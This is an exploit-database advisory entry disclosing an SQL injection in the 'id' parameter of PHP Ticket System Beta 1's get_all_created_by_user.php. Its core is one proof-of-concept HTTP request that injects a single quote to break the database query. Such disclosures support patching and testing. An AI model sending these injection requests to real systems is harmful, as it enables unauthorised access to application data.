PHP Ticket System Beta 1 get_all_created_by_user.php id param - SQL Injection

2014-02-28T00:00:00
ID EDB-ID:31971
Type exploitdb
Reporter HauntIT
Modified 2014-02-28T00:00:00

Description

PHP Ticket System Beta 1 (get_all_created_by_user.php id param) - SQL Injection. Webapps exploit for php platform

                                        
                                            # ==============================================================
# Title ...| PHP Ticket System SQL Injection
# Version .| BETA_1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net/projects/phpticketsystem/
# ==============================================================

 
# ==============================================================
# SQL Injection

---<request>---
GET /k/cms/beta/mods/tickets/data/get_all_created_by_user.php?id='mynameissqli&sort%5B0%5D%5Bfield%5D=undefined&sort%5B0%5D%5Bdir%5D=desc HTTP/1.1
Host: 10.149.14.62
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/